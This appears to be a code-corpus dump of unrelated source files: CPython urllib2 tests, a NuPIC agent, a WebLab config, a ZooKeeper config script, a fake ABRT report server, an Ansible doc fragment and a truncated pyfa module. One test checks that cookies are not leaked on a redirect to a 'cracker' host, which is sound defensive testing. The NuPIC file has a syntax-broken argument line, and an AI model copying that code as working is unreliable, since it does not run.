from test.test_http_cookiejar import interact_netscape
cj = CookieJar()
interact_netscape(cj, "http://www.example.com/", "spam=eggs")
hh = MockHTTPHandler(302, "Location: http://www.cracker.com/\r\n\r\n")
hdeh = urllib.request.HTTPDefaultErrorHandler()
hrh = urllib.request.HTTPRedirectHandler()
cp = urllib.request.HTTPCookieProcessor(cj)
o = build_test_opener(hh, hdeh, hrh, cp)
o.open("http://www.example.com/")
self.assertFalse(hh.req.has_header("Cookie"))
def test_redirect_fragment(self):
redirected_url = 'http://www.example.com/index.html#OK\r\n\r\n'
hh = MockHTTPHandler(302, 'Location: ' + redirected_url)
hdeh = urllib.request.HTTPDefaultErrorHandler()
hrh = urllib.request.HTTPRedirectHandler()
o = build_test_opener(hh, hdeh, hrh)
fp = o.open('http://www.example.com')
self.assertEqual(fp.geturl(), redirected_url.strip())
def test_proxy(self):
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("http_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("http://acme.example.com/")
self.assertEqual(req.host, "acme.example.com")
o.open(req)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual([(handlers[0], "http_open")],
[tup[0:2] for tup in o.calls])
def test_proxy_no_proxy(self):
os.environ['no_proxy'] = 'python.org'
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com"))
o.add_handler(ph)
req = Request("http://www.perl.org/")
self.assertEqual(req.host, "www.perl.org")
o.open(req)
self.assertEqual(req.host, "proxy.example.com")
req = Request("http://www.python.org")
self.assertEqual(req.host, "www.python.org")
o.open(req)
self.assertEqual(req.host, "www.python.org")
del os.environ['no_proxy']
def test_proxy_no_proxy_all(self):
os.environ['no_proxy'] = '*'
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com"))
o.add_handler(ph)
req = Request("http://www.python.org")
self.assertEqual(req.host, "www.python.org")
o.open(req)
self.assertEqual(req.host, "www.python.org")
del os.environ['no_proxy']
def test_proxy_https(self):
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(https="proxy.example.com:3128"))
o.add_handler(ph)
meth_spec = [
[("https_open", "return response")]
]
handlers = add_ordered_mock_handlers(o, meth_spec)
req = Request("https://www.example.com/")
self.assertEqual(req.host, "www.example.com")
o.open(req)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual([(handlers[0], "https_open")],
[tup[0:2] for tup in o.calls])
def test_proxy_https_proxy_authorization(self):
o = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(https='proxy.example.com:3128'))
o.add_handler(ph)
https_handler = MockHTTPSHandler()
o.add_handler(https_handler)
req = Request("https://www.example.com/")
req.add_header("Proxy-Authorization","FooBar")
req.add_header("User-Agent","Grail")
self.assertEqual(req.host, "www.example.com")
self.assertIsNone(req._tunnel_host)
o.open(req)
# Verify Proxy-Authorization gets tunneled to request.
# httpsconn req_headers do not have the Proxy-Authorization header but
# the req will have.
self.assertNotIn(("Proxy-Authorization","FooBar"),
https_handler.httpconn.req_headers)
self.assertIn(("User-Agent","Grail"),
https_handler.httpconn.req_headers)
self.assertIsNotNone(req._tunnel_host)
self.assertEqual(req.host, "proxy.example.com:3128")
self.assertEqual(req.get_header("Proxy-authorization"),"FooBar")
# TODO: This should be only for OSX
@unittest.skipUnless(sys.platform == 'darwin', "only relevant for OSX")
def test_osx_proxy_bypass(self):
bypass = {
'exclude_simple': False,
'exceptions': ['foo.bar', '*.bar.com', '127.0.0.1', '10.10',
'10.0/16']
}
# Check hosts that should trigger the proxy bypass
for host in ('foo.bar', 'www.bar.com', '127.0.0.1', '10.10.0.1',
'10.0.0.1'):
self.assertTrue(_proxy_bypass_macosx_sysconf(host, bypass),
'expected bypass of %s to be True' % host)
# Check hosts that should not trigger the proxy bypass
for host in ('abc.foo.bar', 'bar.com', '127.0.0.2', '10.11.0.1', 'test'):
self.assertFalse(_proxy_bypass_macosx_sysconf(host, bypass),
'expected bypass of %s to be False' % host)
# Check the exclude_simple flag
bypass = {'exclude_simple': True, 'exceptions': []}
self.assertTrue(_proxy_bypass_macosx_sysconf('test', bypass))
def test_basic_auth(self, quote_char='"'):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' %
(quote_char, realm, quote_char) )
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_basic_auth_with_single_quoted_realm(self):
self.test_basic_auth(quote_char="'")
def test_basic_auth_with_unquoted_realm(self):
opener = OpenerDirector()
password_manager = MockPasswordManager()
auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
realm = "ACME Widget Store"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm=%s\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
with self.assertWarns(UserWarning):
self._test_basic_auth(opener, auth_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
def test_proxy_basic_auth(self):
opener = OpenerDirector()
ph = urllib.request.ProxyHandler(dict(http="proxy.example.com:3128"))
opener.add_handler(ph)
password_manager = MockPasswordManager()
auth_handler = urllib.request.ProxyBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(auth_handler)
opener.add_handler(http_handler)
self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
realm, http_handler, password_manager,
"http://acme.example.com:3128/protected",
"proxy.example.com:3128",
)
def test_basic_and_digest_auth_handlers(self):
# HTTPDigestAuthHandler raised an exception if it couldn't handle a 40*
# response (http://python.org/sf/1479302), where it should instead
# return None to allow another handler (especially
# HTTPBasicAuthHandler) to handle the response.
# Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
# try digest first (since it's the strongest auth scheme), so we record
# order of calls here to check digest comes first:
class RecordingOpenerDirector(OpenerDirector):
def __init__(self):
OpenerDirector.__init__(self)
self.recorded = []
def record(self, info):
self.recorded.append(info)
class TestDigestAuthHandler(urllib.request.HTTPDigestAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("digest")
urllib.request.HTTPDigestAuthHandler.http_error_401(self,
*args, **kwds)
class TestBasicAuthHandler(urllib.request.HTTPBasicAuthHandler):
def http_error_401(self, *args, **kwds):
self.parent.record("basic")
urllib.request.HTTPBasicAuthHandler.http_error_401(self,
*args, **kwds)
opener = RecordingOpenerDirector()
password_manager = MockPasswordManager()
digest_handler = TestDigestAuthHandler(password_manager)
basic_handler = TestBasicAuthHandler(password_manager)
realm = "ACME Networks"
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
opener.add_handler(basic_handler)
opener.add_handler(digest_handler)
opener.add_handler(http_handler)
# check basic auth isn't blocked by digest handler failing
self._test_basic_auth(opener, basic_handler, "Authorization",
realm, http_handler, password_manager,
"http://acme.example.com/protected",
"http://acme.example.com/protected",
)
# check digest was tried before basic (twice, because
# _test_basic_auth called .open() twice)
self.assertEqual(opener.recorded, ["digest", "basic"]*2)
def test_unsupported_auth_digest_handler(self):
opener = OpenerDirector()
# While using DigestAuthHandler
digest_auth_handler = urllib.request.HTTPDigestAuthHandler(None)
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: Kerberos\r\n\r\n')
opener.add_handler(digest_auth_handler)
opener.add_handler(http_handler)
self.assertRaises(ValueError,opener.open,"http://www.example.com")
def test_unsupported_auth_basic_handler(self):
# While using BasicAuthHandler
opener = OpenerDirector()
basic_auth_handler = urllib.request.HTTPBasicAuthHandler(None)
http_handler = MockHTTPHandler(
401, 'WWW-Authenticate: NTLM\r\n\r\n')
opener.add_handler(basic_auth_handler)
opener.add_handler(http_handler)
self.assertRaises(ValueError,opener.open,"http://www.example.com")
def _test_basic_auth(self, opener, auth_handler, auth_header,
realm, http_handler, password_manager,
request_url, protected_url):
import base64
user, password = "wile", "coyote"
# .add_password() fed through to password manager
auth_handler.add_password(realm, request_url, user, password)
self.assertEqual(realm, password_manager.realm)
self.assertEqual(request_url, password_manager.url)
self.assertEqual(user, password_manager.user)
self.assertEqual(password, password_manager.password)
opener.open(request_url)
# should have asked the password manager for the username/password
self.assertEqual(password_manager.target_realm, realm)
self.assertEqual(password_manager.target_url, protected_url)
# expect one request without authorization, then one with
self.assertEqual(len(http_handler.requests), 2)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
userpass = bytes('%s:%s' % (user, password), "ascii")
auth_hdr_value = ('Basic ' +
base64.encodebytes(userpass).strip().decode())
self.assertEqual(http_handler.requests[1].get_header(auth_header),
auth_hdr_value)
self.assertEqual(http_handler.requests[1].unredirected_hdrs[auth_header],
auth_hdr_value)
# if the password manager can't find a password, the handler won't
# handle the HTTP auth error
password_manager.user = password_manager.password = None
http_handler.reset()
opener.open(request_url)
self.assertEqual(len(http_handler.requests), 1)
self.assertFalse(http_handler.requests[0].has_header(auth_header))
class MiscTests(unittest.TestCase):
def opener_has_handler(self, opener, handler_class):
self.assertTrue(any(h.__class__ == handler_class
for h in opener.handlers))
def test_build_opener(self):
class MyHTTPHandler(urllib.request.HTTPHandler): pass
class FooHandler(urllib.request.BaseHandler):
def foo_open(self): pass
class BarHandler(urllib.request.BaseHandler):
def bar_open(self): pass
build_opener = urllib.request.build_opener
o = build_opener(FooHandler, BarHandler)
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# can take a mix of classes and instances
o = build_opener(FooHandler, BarHandler())
self.opener_has_handler(o, FooHandler)
self.opener_has_handler(o, BarHandler)
# subclasses of default handlers override default handlers
o = build_opener(MyHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
# a particular case of overriding: default handlers can be passed
# in explicitly
o = build_opener()
self.opener_has_handler(o, urllib.request.HTTPHandler)
o = build_opener(urllib.request.HTTPHandler)
self.opener_has_handler(o, urllib.request.HTTPHandler)
o = build_opener(urllib.request.HTTPHandler())
self.opener_has_handler(o, urllib.request.HTTPHandler)
# Issue2670: multiple handlers sharing the same base class
class MyOtherHTTPHandler(urllib.request.HTTPHandler): pass
o = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
self.opener_has_handler(o, MyHTTPHandler)
self.opener_has_handler(o, MyOtherHTTPHandler)
def test_HTTPError_interface(self):
"""
Issue 13211 reveals that HTTPError didn't implement the URLError
interface even though HTTPError is a subclass of URLError.
"""
msg = 'something bad happened'
url = code = fp = None
hdrs = 'Content-Length: 42'
err = urllib.error.HTTPError(url, code, msg, hdrs, fp)
self.assertTrue(hasattr(err, 'reason'))
self.assertEqual(err.reason, 'something bad happened')
self.assertTrue(hasattr(err, 'hdrs'))
self.assertEqual(err.hdrs, 'Content-Length: 42')
expected_errmsg = 'HTTP Error %s: %s' % (err.code, err.msg)
self.assertEqual(str(err), expected_errmsg)
class RequestTests(unittest.TestCase):
def setUp(self):
self.get = Request("http://www.python.org/~jeremy/")
self.post = Request("http://www.python.org/~jeremy/",
"data",
headers={"X-Test": "test"})
def test_method(self):
self.assertEqual("POST", self.post.get_method())
self.assertEqual("GET", self.get.get_method())
def test_data(self):
self.assertFalse(self.get.data)
self.assertEqual("GET", self.get.get_method())
self.get.data = "spam"
self.assertTrue(self.get.data)
self.assertEqual("POST", self.get.get_method())
def test_get_full_url(self):
self.assertEqual("http://www.python.org/~jeremy/",
self.get.get_full_url())
def test_selector(self):
self.assertEqual("/~jeremy/", self.get.selector)
req = Request("http://www.python.org/")
self.assertEqual("/", req.selector)
def test_get_type(self):
self.assertEqual("http", self.get.type)
def test_get_host(self):
self.assertEqual("www.python.org", self.get.host)
def test_get_host_unquote(self):
req = Request("http://www.%70ython.org/")
self.assertEqual("www.python.org", req.host)
def test_proxy(self):
self.assertFalse(self.get.has_proxy())
self.get.set_proxy("www.perl.org", "http")
self.assertTrue(self.get.has_proxy())
self.assertEqual("www.python.org", self.get.origin_req_host)
self.assertEqual("www.perl.org", self.get.host)
def test_wrapped_url(self):
req = Request("<URL:http://www.python.org>")
self.assertEqual("www.python.org", req.host)
def test_url_fragment(self):
req = Request("http://www.python.org/?qs=query#fragment=true")
self.assertEqual("/?qs=query", req.selector)
req = Request("http://www.python.org/#fun=true")
self.assertEqual("/", req.selector)
# Issue 11703: geturl() omits fragment in the original URL.
url = 'http://docs.python.org/library/urllib2.html#OK'
req = Request(url)
self.assertEqual(req.get_full_url(), url)
def test_HTTPError_interface_call(self):
"""
Issue 15701 - HTTPError interface has info method available from URLError
"""
err = urllib.request.HTTPError(msg="something bad happened", url=None,
code=None, hdrs='Content-Length:42', fp=None)
self.assertTrue(hasattr(err, 'reason'))
assert hasattr(err, 'reason')
assert hasattr(err, 'info')
assert callable(err.info)
try:
err.info()
except AttributeError:
self.fail('err.info call failed.')
self.assertEqual(err.info(), "Content-Length:42")
def test_main(verbose=None):
from test import test_urllib2
support.run_doctest(test_urllib2, verbose)
support.run_doctest(urllib.request, verbose)
tests = (TrivialTests,
OpenerDirectorTests,
HandlerTests,
MiscTests,
RequestTests,
RequestHdrsTests)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main(verbose=True)
| agpl-3.0 |
ywcui1990/nupic.research | projects/vehicle-control/agent/run_sm.py | 6 | 7819 | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from collections import defaultdict
import operator
import time
import numpy
from unity_client.server import Server
from nupic.encoders.coordinate import CoordinateEncoder
from nupic.encoders.scalar import ScalarEncoder
from nupic.algorithms.monitor_mixin.trace import CountsTrace
from sensorimotor.extended_temporal_memory import ApicalTiebreakPairMemory
from htmresearch.support.apical_tm_pair_monitor_mixin import (
ApicalTMPairMonitorMixin)
class MonitoredApicalTiebreakPairMemory(
ApicalTMPairMonitorMixin, ApicalTiebreakPairMemory): pass
SCALE = 5
RADIUS = 10
class Agent(object):
def __init__(self):
self.encoder = CoordinateEncoder(n=1024,
w=21)
self.motorEncoder = ScalarEncoder(21, -1, 1,
n=1024)
self.tm = MonitoredApicalTiebreakPairMemory(
columnDimensions=[2048],
basalInputDimensions: (999999,) # Dodge input checking.
cellsPerColumn=1,
initialPermanence=0.5,
connectedPermanence=0.6,
permanenceIncrement=0.1,
permanenceDecrement=0.02,
minThreshold=35,
activationThreshold=35,
maxNewSynapseCount=40)
self.plotter = Plotter(self.tm, showOverlaps=False, showOverlapsValues=False)
self.lastState = None
self.lastAction = None
self.prevMotorPattern = ()
def sync(self, outputData):
if not ("location" in outputData and
"steer" in outputData):
print "Warning: Missing data:", outputData
return
reset = outputData.get("reset") or False
if reset:
print "Reset."
self.tm.reset()
location = outputData["location"]
steer = outputData["steer"]
x = int(location["x"] * SCALE)
z = int(location["z"] * SCALE)
coordinate = numpy.array([x, z])
encoding = self.encoder.encode((coordinate, RADIUS))
motorEncoding = self.motorEncoder.encode(steer)
sensorPattern = set(encoding.nonzero()[0])
motorPattern = set(motorEncoding.nonzero()[0])
self.tm.compute(sensorPattern,
activeCellsExternalBasal=motorPattern,
reinforceCandidatesExternalBasal=self.prevMotorPattern,
growthCandidatesExternalBasal=self.prevMotorPattern)
print self.tm.mmPrettyPrintMetrics(self.tm.mmGetDefaultMetrics())
self.plotter.update(encoding, reset)
if reset:
self.plotter.render()
self.lastState = encoding
self.lastAction = steer
self.prevMotorPattern = motorPattern
class Plotter(object):
def __init__(self, tm, showOverlaps=False, showOverlapsValues=False):
self.tm = tm
self.showOverlaps = showOverlaps
self.showOverlapsValues = showOverlapsValues
self.encodings = []
self.resets = []
self.numSegmentsPerCell = []
self.numSynapsesPerSegment = []
import matplotlib.pyplot as plt
self.plt = plt
import matplotlib.cm as cm
self.cm = cm
from pylab import rcParams
if self.showOverlaps and self.showOverlapsValues:
rcParams.update({'figure.figsize': (20, 20)})
else:
rcParams.update({'figure.figsize': (6, 12)})
rcParams.update({'figure.autolayout': True})
rcParams.update({'figure.facecolor': 'white'})
rcParams.update({'ytick.labelsize': 8})
def update(self, encoding, reset):
self.encodings.append(encoding)
self.resets.append(reset)
# TODO: Deal with empty segments / unconnected synapses
numSegmentsPerCell = [len(segments) for segments in
self.tm.connections._segmentsForCell.values()]
self.numSegmentsPerCell.append(numpy.array(numSegmentsPerCell))
numSynapsesPerSegment = [len(synapses) for synapses in
self.tm.connections._synapsesForSegment.values()]
self.numSynapsesPerSegment.append(numpy.array(numSynapsesPerSegment))
def render(self):
timestamp = int(time.time())
self.plt.figure(1)
self.plt.clf()
self._renderMetrics(timestamp)
if self.showOverlaps:
self.plt.figure(2)
self.plt.clf()
self._renderOverlaps(timestamp)
def _renderMetrics(self, timestamp):
traces = self.tm.mmGetDefaultTraces()
traces = [trace for trace in traces if type(trace) is CountsTrace]
t = len(traces)
n = t + 2
for i in xrange(t):
trace = traces[i]
self.plt.subplot(n, 1, i+1)
self._plot(trace.data, trace.title)
self.plt.subplot(n, 1, t+1)
self._plotDistributions(self.numSegmentsPerCell, "# segments per cell")
self.plt.subplot(n, 1, t+2)
self._plotDistributions(self.numSynapsesPerSegment, "# synapses per segment")
self.plt.draw()
self.plt.savefig("sm-{0}_A.png".format(timestamp))
def _renderOverlaps(self, timestamp):
self.plt.subplot(1, 1, 1)
overlaps = self._computeOverlaps()
self._imshow(overlaps, "Overlaps", aspect=None)
for i in self._computeResetIndices():
self.plt.axvline(i, color='black', alpha=0.5)
self.plt.axhline(i, color='black', alpha=0.5)
if self.showOverlapsValues:
for i in range(len(overlaps)):
for j in range(len(overlaps[i])):
overlap = "%.1f" % overlaps[i][j]
self.plt.annotate(overlap, xy=(i, j), fontsize=6, color='red', verticalalignment='center', horizontalalignment='center')
self.plt.draw()
self.plt.savefig("sm-{0}_B.png".format(timestamp))
def _computeOverlaps(self):
overlaps = []
encodings = self.encodings
for i in range(len(encodings)):
row = []
for j in range(len(encodings)):
n = max(encodings[i].sum(), encodings[j].sum())
overlap = (encodings[i] & encodings[j]).sum() / float(n)
row.append(overlap)
overlaps.append(row)
return overlaps
def _computeResetIndices(self):
return numpy.array(self.resets).nonzero()[0]
def _plot(self, data, title):
self.plt.plot(range(len(data)), data)
self._finishPlot(data, title)
def _finishPlot(self, data, title):
self.plt.title(title)
self.plt.xlim(0, len(data))
for i in self._computeResetIndices():
self.plt.axvline(i, color='black', alpha=0.5)
def _imshow(self, data, title, aspect='auto'):
self.plt.title(title)
self.plt.imshow(data,
cmap=self.cm.Greys,
interpolation="nearest",
aspect=aspect,
vmin=0,
vmax=1)
def _plotDistributions(self, data, title):
means = [numpy.mean(x) if len(x) else 0 for x in data]
maxs = [numpy.max(x) if len(x) else 0 for x in data]
self.plt.plot(range(len(data)), means, label='mean')
self.plt.plot(range(len(data)), maxs, label='max')
self.plt.legend(loc='lower right')
self._finishPlot(data, title)
if __name__ == "__main__":
agent = Agent()
Server(agent)
| agpl-3.0 |
morelab/weblabdeusto | server/launch/sample_balanced2_concurrent_experiments/main_machine/lab_and_experiment1/experiment48/server_config.py | 968 | 1526 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
weblab_xilinx_experiment_xilinx_device = 'FPGA'
weblab_xilinx_experiment_port_number = 1
# This should be something like this:
# import os as _os
# xilinx_home = _os.getenv('XILINX_HOME')
# if xilinx_home == None:
# if _os.name == 'nt':
# xilinx_home = r'C:\Program Files\Xilinx'
# elif _os.name == 'posix':
# xilinx_home = r"/home/nctrun/Xilinx"
#
# if _os.name == 'nt':
# xilinx_impact_full_path = [xilinx_home + r'\bin\nt\impact']
# elif _os.name == 'posix':
# xilinx_impact_full_path = [xilinx_home + r'/bin/lin/impact']
# But for testing we are going to fake it:
xilinx_home = "."
xilinx_impact_full_path = ["python","./tests/unit/weblab/experiment/devices/xilinx_impact/fake_impact.py" ]
xilinx_device_to_program = 'XilinxImpact' # 'JTagBlazer', 'DigilentAdept'
xilinx_device_to_send_commands = 'SerialPort' # 'HttpDevice'
digilent_adept_full_path = ["python","./test/unit/weblab/experiment/devices/digilent_adept/fake_digilent_adept.py" ]
digilent_adept_batch_content = """something with the variable $FILE"""
xilinx_http_device_ip_FPGA = "192.168.50.138"
xilinx_http_device_port_FPGA = 80
xilinx_http_device_app_FPGA = ""
xilinx_batch_content_FPGA = """setMode -bs
setCable -port auto
addDevice -position 1 -file $FILE
Program -p 1
exit
"""
# Though it is not really a FPGA, the webcam url var name depends on the device,
# specified above.
fpga_webcam_url = '''https://www.weblab.deusto.es/webcam/fpga0/image.jpg'''
| bsd-2-clause |
ahujamoh/seldon-server | scripts/zookeeper/set-client-config.py | 7 | 1898 | #!/usr/bin/env python
import sys, getopt, argparse
from kazoo.client import KazooClient
import json
def loadZookeeperOptions(opts,zk):
node = "/all_clients/"+opts['client']+"/offline/semvec"
if zk.exists(node):
data, stat = zk.get(node)
jStr = data.decode("utf-8")
print "Found zookeeper configuration:",jStr
j = json.loads(jStr)
for key in j:
opts[key] = j[key]
def activateModel(args,folder,zk):
node = "/all_clients/"+args.client+"/svtext"
print "Activating model in zookeper at node ",node," with data ",folder
if zk.exists(node):
zk.set(node,folder)
else:
zk.create(node,folder,makepath=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='set-client-config')
parser.add_argument('-z', '--zookeeper', help='zookeeper hosts', required=True)
parser.add_argument('--clientVariable', help='client variable name', default="$CLIENT")
args = parser.parse_args()
opts = vars(args)
zk = KazooClient(hosts=args.zookeeper)
zk.start()
for line in sys.stdin:
line = line.rstrip()
parts = line.split()
if len(parts) == 3 and not line.startswith("#"):
clients = parts[0].split(',')
node = parts[1]
value = parts[2]
print "--------------------------"
print parts[0],node,"->",value
for client in clients:
nodeClient = node.replace(args.clientVariable,client)
valueClient = value.replace(args.clientVariable,client)
print "----"
print nodeClient
print valueClient
if zk.exists(nodeClient):
zk.set(nodeClient,valueClient)
else:
zk.create(nodeClient,valueClient,makepath=True)
zk.stop()
| apache-2.0 |
mhabrnal/abrt | tests/runtests/abrt-cli-report-mantisbt/fakefaf.py | 6 | 1502 | #!/usr/bin/env python
# Single purpose HTTP server
# - accepts POST of ureport JSON and dumps it to a file
import sys
import json
import BaseHTTPServer, cgi
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_POST(self):
# parse form data
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
}
)
self.send_response(202)
self.send_header('Content-Type', 'application/json')
self.send_header('Connection', 'close')
self.end_headers()
if self.path == '/reports/new/':
ureport = json.load(form['file'].file)
with open(self.save_ureport, 'w') as fh:
json.dump(ureport, fh, indent=2)
response = {
'bthash': '691cf824e3e07457156125636e86c50279e29496',
'reported_to': [
{}
],
'result': False
}
else:
with open(self.save_ureport, 'w') as fh:
fh.write('{"invalid_request_path": "%s"}' % self.path)
return
json.dump(response, self.wfile, indent=2)
PORT = 12345
print "Serving at port", PORT
Handler.save_ureport = sys.argv[1] if len(sys.argv) > 1 else 'ureport.json'
httpd = BaseHTTPServer.HTTPServer(("127.0.0.1", PORT), Handler)
httpd.serve_forever()
| gpl-2.0 |
h3biomed/ansible | lib/ansible/plugins/doc_fragments/default_callback.py | 3 | 1911 | # -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
DOCUMENTATION = r'''
options:
display_skipped_hosts:
name: Show skipped hosts
description: "Toggle to control displaying skipped task/host results in a task"
type: bool
default: yes
env:
- name: DISPLAY_SKIPPED_HOSTS
deprecated:
why: environment variables without "ANSIBLE_" prefix are deprecated
version: "2.12"
alternatives: the "ANSIBLE_DISPLAY_SKIPPED_HOSTS" environment variable
- name: ANSIBLE_DISPLAY_SKIPPED_HOSTS
ini:
- key: display_skipped_hosts
section: defaults
display_ok_hosts:
name: Show 'ok' hosts
description: "Toggle to control displaying 'ok' task/host results in a task"
type: bool
default: yes
env:
- name: ANSIBLE_DISPLAY_OK_HOSTS
ini:
- key: display_ok_hosts
section: defaults
version_added: '2.7'
display_failed_stderr:
name: Use STDERR for failed and unreachable tasks
description: "Toggle to control whether failed and unreachable tasks are displayed to STDERR (vs. STDOUT)"
type: bool
default: no
env:
- name: ANSIBLE_DISPLAY_FAILED_STDERR
ini:
- key: display_failed_stderr
section: defaults
version_added: '2.7'
show_custom_stats:
name: Show custom stats
description: 'This adds the custom stats set via the set_stats plugin to the play recap'
type: bool
default: no
env:
- name: ANSIBLE_SHOW_CUSTOM_STATS
ini:
- key: show_custom_stats
section: defaults
'''
| gpl-3.0 |
pyfa-org/Pyfa | eos/saveddata/fighterAbility.py | 2 | 5835 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
from logbook import Logger
from sqlalchemy.orm import reconstructor
from eos.utils.stats import DmgTypes
pyfalog = Logger(__name__)
class FighterAbility:
# We aren't able to get data on the charges that can be stored with fighters. So we hardcode that data here, keyed
# with the fighter squadron role
NUM_SHOTS_MAPPING = {
1: 0, # Superiority fighter / Attack
2: 12, # Light fighter / Attack
4: 6, # Heavy fighter / Heavy attack
5: 3, # Heavy fighter / Long range attack
}
# Same as above
REARM_TIME_MAPPING = {
1: 0, # Superiority fighter / Attack
2: 4000, # Light fighter / Attack
4: 6000, # Heavy fighter / Heavy attack
5: 20000, # Heavy fighter / Long range attack
}
def __init__(self, effect):
"""Initialize from the program"""
self.__effect = effect
self.effectID = effect.ID if effect is not None else None
self.active = False
self.build()
@reconstructor
def init(self):
"""Initialize from the database"""
self.__effect = None
if self.effectID:
self.__effect = next((x for x in self.fighter.item.effects.values() if x.ID == self.effectID), None)
if self.__effect is None:
pyfalog.error("Effect (id: {0}) does not exist", self.effectID)
return
self.build()
def build(self):
pass
@property
def effect(self):
return self.__effect
@property
def name(self):
return self.__effect.getattr('displayName') or self.__effect.name
@property
def attrPrefix(self):
return self.__effect.getattr('prefix')
@property
def dealsDamage(self):
attr = "{}DamageMultiplier".format(self.attrPrefix)
return attr in self.fighter.itemModifiedAttributes or self.fighter.charge is not None
@property
def grouped(self):
# is the ability applied per fighter (webs, returns False), or as a group (MWD, returned True)
return self.__effect.getattr('grouped')
@property
def hasCharges(self):
return self.__effect.getattr('hasCharges')
@property
def reloadTime(self):
return self.getReloadTime()
def getReloadTime(self, spentShots=None):
if spentShots is not None:
spentShots = max(self.numShots, spentShots)
else:
spentShots = self.numShots
rearm_time = (self.REARM_TIME_MAPPING[self.fighter.getModifiedItemAttr("fighterSquadronRole")] or 0 if self.hasCharges else 0)
return self.fighter.getModifiedItemAttr("fighterRefuelingTime") + rearm_time * spentShots
@property
def numShots(self):
return self.NUM_SHOTS_MAPPING[self.fighter.getModifiedItemAttr("fighterSquadronRole")] or 0 if self.hasCharges else 0
@property
def cycleTime(self):
speed = self.fighter.getModifiedItemAttr("{}Duration".format(self.attrPrefix))
return speed
def getVolley(self, targetProfile=None):
if not self.dealsDamage or not self.active:
return DmgTypes(0, 0, 0, 0)
if self.attrPrefix == "fighterAbilityLaunchBomb":
em = self.fighter.getModifiedChargeAttr("emDamage", 0)
therm = self.fighter.getModifiedChargeAttr("thermalDamage", 0)
kin = self.fighter.getModifiedChargeAttr("kineticDamage", 0)
exp = self.fighter.getModifiedChargeAttr("explosiveDamage", 0)
else:
em = self.fighter.getModifiedItemAttr("{}DamageEM".format(self.attrPrefix), 0)
therm = self.fighter.getModifiedItemAttr("{}DamageTherm".format(self.attrPrefix), 0)
kin = self.fighter.getModifiedItemAttr("{}DamageKin".format(self.attrPrefix), 0)
exp = self.fighter.getModifiedItemAttr("{}DamageExp".format(self.attrPrefix), 0)
dmgMult = self.fighter.amount * self.fighter.getModifiedItemAttr("{}DamageMultiplier".format(self.attrPrefix), 1)
volley = DmgTypes(
em=em * dmgMult * (1 - getattr(targetProfile, "emAmount", 0)),
thermal=therm * dmgMult * (1 - getattr(targetProfile, "thermalAmount", 0)),
kinetic=kin * dmgMult * (1 - getattr(targetProfile, "kineticAmount", 0)),
explosive=exp * dmgMult * (1 - getattr(targetProfile, "explosiveAmount", 0)))
return volley
def getDps(self, targetProfile=None, cycleTimeOverride=None):
volley = self.getVolley(targetProfile=targetProfile)
if not volley:
return DmgTypes(0, 0, 0, 0)
